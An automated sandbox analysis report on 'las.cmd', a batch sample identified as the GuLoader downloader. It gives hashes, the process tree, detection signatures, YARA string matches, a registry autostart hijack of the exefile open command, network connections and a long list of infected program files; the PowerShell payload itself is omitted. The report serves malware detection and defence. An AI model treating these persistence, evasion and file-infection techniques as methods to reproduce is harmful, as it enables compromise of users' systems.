
Windows Analysis Report
las.cmd

Overview

General Information

Sample name: las.cmd
Analysis ID: 1446786
MD5: f96b390af9be44e21ffec109cb107462
SHA1: 716dda50fc30581e587c0a3d8c65d45aefbfec14
SHA256: c73db3a4bf51b48059eef2a5003feafc43dc7e93bf8c70fb51a0423c212d85a7
Tags: cmd

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7596 cmdline: powershell.exe -windowstyle hidden "[obfuscated PowerShell command line omitted]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7780 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7844 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7928 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7244 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 7596 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
              Source | Rule | Description | Author | Strings
              amsi64_7596.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
              amsi32_7844.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xe0e0:$b2: ::FromBase64String(
              • 0xd1ab:$s1: -join
              • 0x6957:$s4: +=
              • 0x6a19:$s4: +=
              • 0xac40:$s4: +=
              • 0xcd5d:$s4: +=
              • 0xd047:$s4: +=
              • 0xd18d:$s4: +=
              • 0x17270:$s4: +=
              • 0x172f0:$s4: +=
              • 0x173b6:$s4: +=
              • 0x17436:$s4: +=
              • 0x1760c:$s4: +=
              • 0x17690:$s4: +=
              • 0xd981:$e4: Get-WmiObject
              • 0xdb70:$e4: Get-Process
              • 0xdbc8:$e4: Start-Process
              • 0x15d88:$e4: Get-Process

              System Summary

              Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\svchost.com "%1" %*, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7244, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
              Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "[obfuscated PowerShell command line omitted]"
              No Snort rule has matched


              AV Detection

              Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Joe Sandbox ML: detected
              Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
              Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
              Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
              Source: Binary string: wab.pdbGCTL source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: msoev.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
              Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SCANPST.EXE.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
              Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

              Spreading

Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
